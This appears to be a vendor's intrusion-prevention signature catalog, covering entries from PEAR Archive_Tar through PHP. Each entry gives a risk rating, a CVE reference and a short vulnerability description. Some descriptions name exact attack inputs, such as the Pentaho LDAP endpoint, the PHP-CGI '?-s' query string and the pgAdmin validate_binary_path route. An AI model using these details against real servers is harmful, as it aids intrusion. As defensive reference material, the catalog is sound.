Risk: Moderate
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: PEAR Archive_Tar
Type: Malfunction
Description: Improper validation of file names inside TAR files causes a vulnerability in PEAR Archive_Tar, allowing an attacker to overwrite arbitrary files on the target system by means of a crafted archive file.
Situation: File-Binary_Path-Traversal-Via-Tar-Archive
References:
CVE-2021-32610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32610
Back to top

Pear-Archive-Tar-File-Protocol-Handling-Arbitrary-File-Overwrite

About this vulnerability: A vulnerability in PEAR Archive_Tar
Risk: Moderate
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: PEAR Archive_Tar; Drupal
Type: Malfunction
Description: Improper archive member file name validation causes a file overwrite vulnerability in the PEAR Archive_Tar module of Drupal. A successful exploit allows an attacker to overwrite arbitrary files with the privileges of the affected process.
Situation: File-Binary_Suspicious-File-Name-In-Tar-Archive
References:
CVE-2020-28949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949
Back to top

Pear-Archive-Tar-Phar-Protocol-Handling-Deserialization-Code-Execution

About this vulnerability: A vulnerability in PEAR Archive_Tar
Risk: Moderate
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: PEAR Archive_Tar; Drupal
Type: Malfunction
Description: Improper validation of file names in the PEAR Archive_Tar module causes a deserialization vulnerability which can allow an attacker to execute arbitrary code on the target system with the privileges of the affected program.
Situation: File-Binary_Suspicious-File-Name-In-Tar-Archive
References:
CVE-2020-28948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28948
Back to top

Pear-Archive-Tar-Symbolic-Link-Handling-Arbitrary-File-Overwrite

About this vulnerability: A vulnerability in PEAR Archive_Tar
Risk: Moderate
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: PEAR Archive_Tar; Drupal
Type: Malfunction
Description: Improper validation of file names in TAR archives causes a vulnerability in the PEAR Archive_Tar module for Drupal. A successful exploit allows an attacker to overwrite arbitrary files on the target system.
Situation: File-Binary_Suspicious-Link-Name-In-Tar-Archive
References:
CVE-2020-36193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36193
Back to top

PEDICOM-Polyglot-File

About this vulnerability: PEDICOM polyglot file was detected
Risk: High
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: PEDICOM is a polyglot file combining a PE executable and DICOM image file.
Situation: File-Exe_PEDICOM-Polyglot-File
Back to top

PeerCast-Get-Request-Format-String

About this vulnerability: A vulnerability in PeerCast
Risk: High
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PeerCast
Type: Input Validation
Description: There is a vulnerability in PeerCast.
Situation: Generic_CS-PeerCast-Request-Format-String
HTTP_CSU-PeerCast-Request-Format-String
References:
CVE-2005-1806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1806
Back to top

PeerCast-HTTP-Authentication-Buffer-Overflow

About this vulnerability: A buffer overflow attempt in PeerCast HTTP Authentication was detected
Risk: Moderate
First detected in: sgpkg-ips-500-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PeerCast
Type: Buffer Overflow
Description: A long authorization header was detected in PeerCast login port due to a likely buffer overflow attempt.
Situation: HTTP_CSH-PeerCast-HTTP-Authentication-Buffer-Overflow
Back to top

PeerCast-Stream-Buffer-Overflow

About this vulnerability: Stack based buffer overflow in PeerCast
Risk: High
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: PeerCast
Type: Buffer Overflow
Description: Multiple stack-based buffer overflows in the procConnectArgs function in PeerCast before 0.1217 allow remote attackers to execute arbitrary code.
Situation: HTTP_CSU-PeerCast-Stream-BOF
References:
CVE-2006-1148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1148
BID-17040
http://www.securityfocus.com/bid/17040
OSVDB-23777
http://www.osvdb.org/23777
Back to top

Pentaho-Business-Server-Auth-Bypass-And-Server-Side-Template-Injection-RCE

About this vulnerability: An attempt to exploit a vulnerability in Pentaho Business Analytics Server detected
Risk: High
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Platform: Unix;Linux;Windows
Software: Pentaho Business Analytics Server
Type: Input Validation
Description: A vulnerability in Pentaho Business Analytics Server, versions 9.4.0.1 and 9.3.0.2, including 8.3.x, which allows remote attackers to bypass authentication and achieve remote code execution by sending a GET request to /api/ldap/config/ldapTreeNodeChildren, followed by a series of characters allowed by the regex validation, which then allows the attacker to append any characters of their choice.
Situation: HTTP_CSU-Pentaho-Business-Server-Auth-Bypass-And-Server-Side-Template-Injection-RCE
References:
CVE-2022-43939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43939
Back to top

Pentaho-Business-Server-Server-Side-Template-Injection-CVE-2022-43769

About this vulnerability: A vulnerability in Pentaho Business Analytics Server
Risk: High
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Unix;Linux;Windows
Software: Pentaho Business Analytics Server
Type: Input Validation
Description: A Thymeleaf template injection vulnerability has been reported in Pentaho Business Analytics Server, versions 9.4.0.1 and 9.3.0.2, including 8.3.x. This vulnerability can be chained together with an authentication bypass vulnerability CVE-2022-43939 for unauthenticated remote command execution via a single crafted HTTP GET request.
Situation: HTTP_CSU-Pentaho-Business-Server-Auth-Bypass-And-Server-Side-Template-Injection-RCE
References:
CVE-2022-43769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43769
Back to top

Percent-Encoded-Ascii-Control-Characters

About this vulnerability: HTTP POST with percent encoded ASCII control characters
Risk: Low
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Post Compromise Behaviour
Description: A HTTP POST request containing percent encoded ASCII control characters is very unusual for most web applications and may indicate encrypted malware traffic.
Situation: HTTP_CS-Percent-Encoded-Ascii-Control-Characters
Back to top

Perl-Archive-Tar-Arbitrary-File-Overwrite

About this vulnerability: A vulnerability in Perl Foundation Archive::Tar
Risk: Moderate
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Perl
Type: Input Validation
Description: Improper handling of symbolic links in a tar archive causes a file overwrite vulnerability in the Perl Archive::Tar component. A successful exploit allows an attacker to overwrite files on the target system.
Situation: File-Binary_Perl-Archive-Tar-Arbitrary-File-Overwrite
References:
CVE-2018-12015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12015
Back to top

Perl-Archive-Zip-Arbitrary-File-Overwrite

About this vulnerability: A vulnerability in Perl Foundation Archive::Zip
Risk: Moderate
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Perl
Type: Input Validation
Description: Improper path sanitization in the Perl Archive::Zip module causes a file overwrite vulnerability, which can be exploited to overwrite arbitrary files on the target system.
Situation: File-Zip_Perl-Archive-Zip-Arbitrary-File-Overwrite
References:
CVE-2018-10860
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10860
Back to top

Perl-Obfuscator-Code

About this vulnerability: Executable code obfuscated with online Perl obfuscator
Risk: Moderate
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Post Compromise Behaviour
Description: Seeing obfuscated code may sometimes indicate malicious code trying to evade network inspection.
Situation: File-Text_Perl-Obfuscator-Code
Back to top

Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101

About this vulnerability: A vulnerability in Perl Spreadsheet::ParseExcel
Risk: High
First detected in: sgpkg-ips-1705-5242
Last changed: sgpkg-ips-1705-5242
Platform: Generic
Software: Perl; Barracuda ESG
Type: Input Validation
Description: A code injection vulnerability has been reported in the Spreadsheet::ParseExcel module of Perl. The vulnerability is due to passing invalidated input from a file into the Perl eval function. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted file, or by sending a crafted request to the target application using the vulnerable library. Successful exploitation of this vulnerability could result in arbitrary code execution in the security context of the application using the vulnerable library.
Situation: File-OLE_Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101
File-TextId_Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101
References:
CVE-2023-7101
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7101
Back to top

Perseus-Trojan-Infection-Traffic

About this vulnerability: Perseus trojan infection traffic
Risk: Moderate
First detected in: sgpkg-ips-1357-5242
Last changed: sgpkg-ips-1357-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Perseus trojan infection traffic was detected.
Situation: MSSQL_Perseus-Trojan-Infection-Traffic
Back to top

Persistent-Systems-Radia-Client-Automation-Command-Execution

About this vulnerability: A vulnerability in Persistent Systems Radia Client Automation
Risk: Moderate
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Persistent Systems Radia Client Automation
Type: Malfunction
Description: A command execution vulnerability exists in Persistent Systems Radia Client Automation. The vulnerability is due to missing authentication while processing requests to the radexecd process. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected system. Successful exploitation could allow execution of arbitrary commands with SYSTEM privileges.
Situation: Generic_CS-Persistent-Systems-Radia-Client-Automation-Command-Execution
References:
CVE-2015-1497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1497
BID-72612
http://www.securityfocus.com/bid/72612
OSVDB-118382
http://www.osvdb.org/118382
Back to top

Persits-Xupload-ActiveX-Buffer-Overflow

About this vulnerability: A Persits Xupload ActiveX Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Persits XUpload
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Persits XUpload, versions 3.0.0.4 and before, which allows remote attackers to execute arbitrary code via a long argument to the AddFile method.
Situation: File-Text_Persits-Xupload-ActiveX-Buffer-Overflow
References:
CVE-2008-0492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0492
BID-27456
http://www.securityfocus.com/bid/27456
OSVDB-40762
http://www.osvdb.org/40762
Back to top

PetitPotam-NTLM-Relay-Attack

About this vulnerability: An attempt to execute the PetitPotam NTLM relay attack detected
Risk: High
First detected in: sgpkg-ips-1375-5242
Last changed: sgpkg-ips-1823-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to execute the PetitPotam NTLM relay attack detected.
Situation: SMB-TCP_PetitPotam-NTLM-Relay-Attack
References:
CVE-2021-36942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36942
Back to top

Pfsense-Authenticated-Group-Member-Remote-Command-Execution

About this vulnerability: A Pfsense Authenticated Group Member Remote Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1818-5242
Platform: FreeBSD
Software: PfSense
Type: Input Validation
Description: A vulnerability in PfSense, version 2.3.1_1 and before, which allows remote attackers to execute arbitrary commands via the system_groupmanager.php page.
Situation: HTTP_CRL-Pfsense-Post-Auth-Group-Member-Command-Execution
Back to top

Pfsense-Post-Auth-Group-Member-Command-Execution

About this vulnerability: A vulnerability in pfSense firewall
Risk: Moderate
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1818-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: A command injection vulnerability has been reported in pfSense. This vulnerability is due to system_groupmanager.php incorrectly validating the members HTTP parameter. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the system_groupmanager.php URI. Successful exploitation will result in arbitrary command execution with root privileges.
Situation: HTTP_CRL-Pfsense-Post-Auth-Group-Member-Command-Execution
Back to top

Pfsense-Webconfigurator-Firewall_Aliases_Edit.php-Input-Validation-Error

About this vulnerability: A vulnerability in Electric Sheep Fencing pfSense
Risk: Moderate
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: PfSense
Type: Input Validation
Description: An input validation error vulnerability exists in Electric Sheep Fencing pfSense firewall. The vulnerability is due to insufficient validation of user supplied input when processing the addressN parameter in firewall_aliases_edit.php. A remote authenticated attacker could exploit this vulnerability by sending a malicious request using the vulnerable parameter to the firewall. Successful exploitation could lead to remote code execution under the security context of the root user.
Situation: HTTP_CRL-Pfsense-Webconfigurator-Firewall_Aliases_Edit-Input-Validation-Error
Back to top

Pfsense-Webgui-Zone-Parameter-Cross-Site-Scripting

About this vulnerability: A vulnerability in pfSense Project pfSense
Risk: High
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in pfSense. The vulnerability is due to services_captiveportal_zones.php not validating the zone parameter when the act parameter is set to del. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted link. Successful exploitation will result in the attacker-controlled script code being executed in the target user's browser in the context of the affected site.
Situation: HTTP_CRL-Pfsense-Webgui-Zone-Parameter-Cross-Site-Scripting
References:
CVE-2015-4029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4029
Back to top

Pgadmin-Authenticated-Remote-Code-Execution-CVE-2023-5002

About this vulnerability: An attempt to exploit a vulnerability in pgAdmin detected
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: pgAdmin
Type: Input Validation
Description: A flaw was found in pgAdmin, which occurs when the pgAdmin server validates the path a user selects to external PostgreSQL utilities such as "pg_dump" and "pg_restore". Versions of pgAdmin prior to 7.6 failed to properly control the server code executed on this API, allowing an authenticated user to run arbitrary commands on the server.
Situation: HTTP_CRL-Pgadmin-Authenticated-Remote-Code-Execution-CVE-2023-5002
References:
CVE-2023-5002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5002
Back to top

Pgadmin-Binary-Path-API-RCE

About this vulnerability: An attempt to exploit a vulnerability in pgAdmin detected
Risk: High
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Platform: Linux; Windows
Software: pgAdmin
Type: Input Validation
Description: A vulnerability in pgAdmin, versions 8.4 and before, which allows remote attackers to upload and execute arbitrary files due to the lack of validation input paths to the validate_binary_path endpoint.
Situation: HTTP_CRL-Pgadmin-Binary-Path-API-RCE
References:
CVE-2024-3116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3116
Back to top

Pgadmin-Import-Servers-Directory-Traversal-CVE-2023-0241

About this vulnerability: A vulnerability in pgAdmin
Risk: High
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1583-5242
Platform: Generic
Software: pgAdmin
Type: Directory Traversal
Description: A directory traversal vulnerability exists in pgAdmin. The vulnerability is due to insufficient input validation of the filenames. A remote attacker can exploit this vulnerability by sending a crafted request to the vulnerable server. Successful exploitation would result in sensitive information disclosure or policy bypass.
Situation: HTTP_CRL-Pgadmin-Import-Servers-Directory-Traversal-CVE-2023-0241
References:
CVE-2023-0241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0241
Back to top

Pgadmin-Pga4_session-Directory-Traversal

About this vulnerability: A vulnerability in pgAdmin
Risk: High
First detected in: sgpkg-ips-1706-5242
Last changed: sgpkg-ips-1706-5242
Platform: Generic
Software: pgAdmin
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in pgAdmin. The vulnerability is due to improper validation of the pga4_session cookie when it is used in a file path. Successful exploitation could result in an attacker deserializing an arbitrary file on the target server, possibly leading to arbitrary code execution under the security context of the pgAdmin service.
Situation: HTTP_CSH-Pgadmin-Pga4_session-Directory-Traversal
References:
CVE-2024-2044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2044
Back to top

Pgadmin-Query-Tool-Authenticated-RCE-CVE-2025-2945

About this vulnerability: A vulnerability in pgAdmin
Risk: High
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: pgAdmin
Type: Input Validation
Description: An vulnerability in pgAdmin, versions before 9.2, which allows authenticated remote attackers to execute arbitrary Python code throught the query_commited and high_availability parameters, due to insufficient validation before being passed to Python eval().
Situation: HTTP_CRL-Pgadmin-Query-Tool-Authenticated-RCE-CVE-2025-2945
References:
CVE-2025-2945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-2945
Back to top

Pgadmin-Validate_Binary_Path-CVE-2024-3116-Remote-Code-Execution

About this vulnerability: A vulnerability in pgAdmin
Risk: High
First detected in: sgpkg-ips-1721-5242
Last changed: sgpkg-ips-1721-5242
Platform: Generic
Software: pgAdmin
Type: Input Validation
Description: A remote code execution vulnerability has been reported in pgAdmin. The vulnerability is due to improper validation of a file path used in the validate_binary_path endpoint. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of the pgAdmin service.
Situation: HTTP_CRL-Pgadmin-Validate_Binary_Path-CVE-2024-3116-Remote-Code-Execution
References:
CVE-2024-3116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3116
Back to top

Pgadmin-Validate_Binary_Path-Remote-Code-Execution

About this vulnerability: A vulnerability in pgAdmin pgAdmin
Risk: Moderate
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Platform: Generic
Software: pgAdmin
Type: Input Validation
Description: Insufficient validation of the utility_path parameter sent to the validate_binary_path endpoint causes a remote code execution vulnerability in pgAdmin. A successful exploit allows an attacker to execute arbitrary code on the target with the privileges of the affected program.
Situation: HTTP_CRL-Pgadmin-Validate_Binary_Path-Remote-Code-Execution
References:
CVE-2022-4223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4223
Back to top

PGP-Key-File

About this vulnerability: A PGP key file was detected
Risk: Moderate
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PGP
Type: Insecure Configuration
Description: A PGP key file was detected
Situation: File-Text_PGP-Private-Key-File
File-Text_PGP-Public-Key-File
Back to top

Phamm-Helpers.php-Cross-Site-Scripting

About this vulnerability: A vulnerability in Phamm Phamm
Risk: Moderate
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Phamm
Type: Input Validation
Description: Lack of request validation causes a cross-site scripting vulnerability in Phamm. A successful attack allows an attacker to execute arbitrary script in the browser of a target user.
Situation: HTTP_CRL-Phamm-Helpers.php-Cross-Site-Scripting
References:
CVE-2017-0378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0378
BID-99927
http://www.securityfocus.com/bid/99927
Back to top

Phatbot-Trojan

About this vulnerability: Phatbot Trojan
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Phatbot is a Windows trojan.
Situation: Generic_SS-Phatbot-Trojan-Infection
FTP_SS-Phatbot-Trojan-Infection
Back to top

Phishing-Related-URL

About this vulnerability: A URL related to phishing sites.
Risk: High
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: The accessed URL looks like a phishing site.
Situation: HTTP_CSH-Phishing-URL-Accessed
Back to top

Phishing-Script_Detected

About this vulnerability: A phishing template was detected.
Risk: High
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1423-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A phishing template for stealing user credentials or other sensitive information was detected.
Situation: File-Text_Phishing-Script_Detected
File-Text_Phishing-Script_Detected_2
Back to top

Phishing-Template-Detected

About this vulnerability: A phishing template was detected.
Risk: High
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A phishing template for stealing user credentials or other sensitive information was detected.
Situation: File-Text_Phishing-Template-Detected-1
File-Text_Phishing-Template-Detected-4
File-Text_Phishing-Template-Detected-3
File-Text_Phishing-Template-Detected-2
File-Text_Phishing-Template-Detected-5
Back to top

Phoenix-Contact-Automationworx-Plcopen-Xml-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Phoenix Contact Automationworx
Risk: Moderate
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Phoenix Contact Automationworx
Type: Buffer Overflow
Description: There exists a stack buffer overflow in the Phoenix Contact Automationworx Suite. Successful exploitation could lead in arbitrary code execution.
Situation: File-Text_Phoenix-Contact-Automationworx-Plcopen-Xml-Stack-Buffer-Overflow
References:
CVE-2020-12497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12497
Back to top

Phorum-SQL-read.php3

About this vulnerability: A vulnerability in Phorum 3.0.7
Risk: Moderate
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Phorum
Type: SQL Injection
Description: There exists an SQL injection vulnerability in Phorum 3.0.7.
Situation: HTTP_CRL-Phorum-SQL-read.php3-Attack
References:
CVE-2000-1233
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1233
OSVDB-118161
http://www.osvdb.org/118161
Back to top

PHP-4-Unserialize-ZVAL-Reference-Counter-Overflow

About this vulnerability: A PHP 4 Unserialize ZVAL Reference Counter Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: PHP
Type: Integer Overflow
Description: An integer overflow vulnerability in PHP, versions 4.4.4 and earlier, which allows remote attackers to execute arbitrary code via a long string to the unserialize function, which triggers an overflow in the ZVAL reference counter.
Situation: HTTP_CSH-PHP-4-Unserialize-ZVAL-Reference-Counter-Overflow
References:
CVE-2007-1286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1286
OSVDB-32771
http://www.osvdb.org/32771
Back to top

Php-Addslashes-Null-Character-Parsing-Error

About this vulnerability: A directory traversal vulnerability in PHP
Risk: Moderate
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Directory Traversal
Description: Old PHP versions do not parse encoded null characters properly, which may allow an attacker to view arbitrary files.
Situation: HTTP_CSU-Dot-Dot-Slash-And-Null-Byte-Sequence
References:
CVE-2004-1020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1020
BID-11981
http://www.securityfocus.com/bid/11981
Back to top

PHP-apache_request_headers-Function-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in the PHP apache_request_headers function detected
Risk: High
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PHP
Type: Buffer Overflow
Description: A buffer overflow vulnerability in the PHP apache_request_headers function, in sapi/cgi/cgi_main.c, versions 5.4.x before 5.4.3, which allows remote attackers to execute arbitrary code or cause a denial of service condition via a long string in an HTTP request header.
Situation: HTTP_SHS-PHP-apache_request_headers-Function-Buffer-Overflow
References:
CVE-2012-2329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2329
BID-53455
http://www.securityfocus.com/bid/53455
OSVDB-82215
http://www.osvdb.org/82215
Back to top

Php-Arbitrary-Location-File-Upload

About this vulnerability: Php allows arbitrary file upload
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: PHP is vulnerable to an arbitrary location file upload vulnerability. This issue is due to a failure of the PHP application to properly sanitize user-supplied file name input which could lead to overwrite $_FILES array elements. An attacker may exploit this issue to upload files to an arbitrary location on a computer running the affected software. This may facilitate arbitrary server-side script code execution as well as other attacks.
Situation: HTTP_CS-Php-Arbitrary-Location-File-Upload
References:
CVE-2004-0959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0959
BID-11190
http://www.securityfocus.com/bid/11190
Back to top

Php-cfgProgDir-Parameter-File-Inclusion

About this vulnerability: PHP script may allow arbitrary file execution
Risk: High
First detected in: sgpkg-ips-147-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Insecure Configuration
Description: PHP is a scripting language used in web servers. Some server scripts may allow downloading arbitrary files for execution using the cfgProgDir parameter.
Situation: HTTP_CRL-Php-cfgProgDir-Parameter-File-Inclusion
Back to top

Php-Cgi-Query-String-Information-Disclosure

About this vulnerability: An information disclosure vulnerability in PHP
Risk: High
First detected in: sgpkg-ips-452-4333
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: PHP
Type: Input Validation
Description: PHP is a scripting language used in web servers. A security vulnerability has been identified in PHP. The vulnerability is due to the way in which query strings that omit an equals sign '=' are handled. A remote, unauthenticated attacker can exploit this vulnerability by appending a query string of the form "?-s" to a URL.
Situation: HTTP_CSU-Php-Cgi-Query-String-Information-Disclosure
HTTP_CSU_PHP-Cgi-Remote-Code-Execution
References:
CVE-2012-1823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
Back to top

PHP-Cgi-Remote-Code-Execution

About this vulnerability: A PHP Cgi Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Input Validation
Description: A vulnerability in PHP, versions before 5.3.12 and 5.4.x before 5.4.2, in sapi/cgi/cgi_main.c, when configured as a CGI script, does not properly handle query strings that are missing an equals sign, which allows remote attackers to execute arbitrary code.
Situation: HTTP_CSU_PHP-Cgi-Remote-Code-Execution
References:
CVE-2012-1823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
OSVDB-81633
http://www.osvdb.org/81633
Back to top

Php-Cgi-Remote-Code-Execution-CVE-2024-4577

About this vulnerability: A vulnerability in PHP
Risk: Critical
First detected in: sgpkg-ips-1735-5242
Last changed: sgpkg-ips-1735-5242
Platform: Windows
Software: PHP
Type: Input Validation
Description: A remote code execution vulnerability has been reported in PHP versions 8.1.x before 8.1.29, 8.2.x before 8.2.20, and 8.3.x before 8.3.8. This vulnerability affects systems that use Apache and PHP-CGI on Windows.
Situation: HTTP_CSU-Php-Cgi-Remote-Code-Execution-CVE-2024-4577
References:
CVE-2024-4577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4577
Back to top

Php-Chart-Wizards-Url-Remote-Code-Execution

About this vulnerability: A remote code execution vulnerability in php-Chart API
Risk: Moderate
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: Insecure Configuration
Description: A vulnerability exists in php-Chart 1.0 API allowing an attacker to execute arbitrary php code.
Situation: HTTP_CSU-Php-Chart-Wizards-Url-Remote-Code-Execution
References:
OSVDB-89334
http://www.osvdb.org/89334
Back to top

Php-Core-Unserialize-Function-Integer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Integer Overflow
Description: A code execution vulnerability has been reported in PHP core. The vulnerability is due to an integer overflow within the unserialize() function. A remote attacker can exploit the vulnerability by sending crafted serialize data to a web application running a vulnerable version of PHP. A successful attack will crash the application, and possibly remote code execution.
Situation: HTTP_CS-Php-Core-Unserialize-Function-Integer-Overflow
References:
CVE-2014-3669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669
OSVDB-113423
http://www.osvdb.org/113423
Back to top

Php-Core-Unserialize-Key-Name-Use-After-Free

About this vulnerability: A vulnerability in PHP
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: A code execution vulnerability has been reported in PHP core. The vulnerability is due to a use after free error when handling serialized objects with identical number key names within the unserialize() function. A remote attacker can exploit the vulnerability by sending crafted serialized data to a web application running a vulnerable version of PHP. A successful attack will result in remote code execution under the context of the service running the PHP service.
Situation: HTTP_CRL-Php-Core-Unserialize-Key-Name-Use-After-Free
References:
CVE-2015-0231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
OSVDB-116020
http://www.osvdb.org/116020
Back to top

Php-Core-Unserialize-Process-Nested-Data-Use-After-Free

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: A code execution vulnerability has been reported in PHP core. The vulnerability is due to a use after free error when handling serialized objects with identical keys within the unserialize() function. A remote attacker can exploit the vulnerability by sending crafted serialized data to a web application running a vulnerable version of PHP. A successful attack will result in remote code execution under the context of the service running the PHP service.
Situation: HTTP_CRL-Php-Core-Unserialize-Key-Name-Use-After-Free
References:
CVE-2014-8142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142
OSVDB-116020
http://www.osvdb.org/116020
Back to top

Php-Dateinterval-Heap-Buffer-Overread-Denial-Of-Service

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Buffer Overflow
Description: A denial of service vulnerability has been reported in PHP. The vulnerability is due to a buffer overread when creating a dateInterval object. A remote attacker can exploit this flaw by sending a malicious request. Successful exploitation could result in a denial of service condition.
